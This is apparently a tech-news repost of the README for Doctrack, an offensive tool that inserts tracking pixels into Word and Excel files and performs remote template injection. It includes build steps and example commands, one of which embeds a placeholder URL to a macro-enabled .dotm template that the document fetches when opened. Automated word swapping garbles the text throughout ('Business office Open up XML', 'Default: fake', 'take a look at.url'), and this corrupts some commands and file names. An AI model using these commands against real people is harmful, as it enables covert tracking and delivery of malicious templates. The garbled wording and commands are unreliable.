Tech News - HakTechs

Doctrack – Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)

Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)

Device to manipulate and insert monitoring pixels into Business office Open XML paperwork.

Capabilities

  • Insert monitoring pixels into Business office Open up XML files (Phrase and Excel)
  • Inject template URL for distant template injection attack
  • Examine exterior concentrate on URLs and metadata
  • Make Business Open up XML documents (#TODO)

Installation

You will need to have to down load .Web Main SDK for your system. Then, to establish single binary on Windows:

$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Launch /p:PublishSingleFile=correct

On Linux:

$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Utilization 

$ doctrack --help
Software to manipulate and insert tracking pixels into Place of work Open XML paperwork.
Copyright (C) 2020 doctrack

  -i, --input         Input filename.
  -o, --output        Output filename.
  -m, --metadata      Metadata to offer (json file)
  -u, --url           URL to insert.
  -e, --template      (Default: fake) If established, enables template URL injection.
  -t, --type          Document kind. If --input is not specified, results in new
                      document and will save as --output.
  -l, --record-kinds    (Default: wrong) Lists offered kinds for document
                      generation.
  -s, --examine       (Default: fake) Examine exterior targets.
  --aid              Screen this assist monitor.

Accessible document kinds mentioned underneath. If you want to insert monitoring URL just use possibly Doc or Workbook varieties, other forms mentioned in this article are only for doc creation (#TODO).

$ doctrack --list-types
Doc              (*.docx)
MacroEnabledDocument  (*.docm)
MacroEnabledTemplate  (*.dotm)
Template              (*.dotx)
Workbook              (*.xlsx)
MacroEnabledWorkbook  (*.xlsm)
MacroEnabledTemplateX (*.xltm)
TemplateX             (*.xltx)

Insert tracking pixel and change document metadata:

$ doctrack -t Document -i check.docx -o exam.docx --metadata metadata.json --url http://take a look at.url/picture.png

Insert distant template URL (distant template injection attack), works only with Term files:

$ doctrack -t Document -i examination.docx -o exam.docx --url http://test.url/template.dotm --template

Inspect external goal URLs and metadata:

$ doctrack -t Document -i check.docx --inspect
[External targets]
Section: /term/doc.xml, ID: R8783bc77406d476d, URI: http://check.url/impression.png
Part: /phrase/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm
[Metadata]
Creator:
Title:
Matter:
Class:
Keyword phrases:
Description:
ContentType:
ContentStatus:
Model:
Revision:
Developed: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:

Impression and Post Source link

Examine Additional on Pentesting Applications

Tags:

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *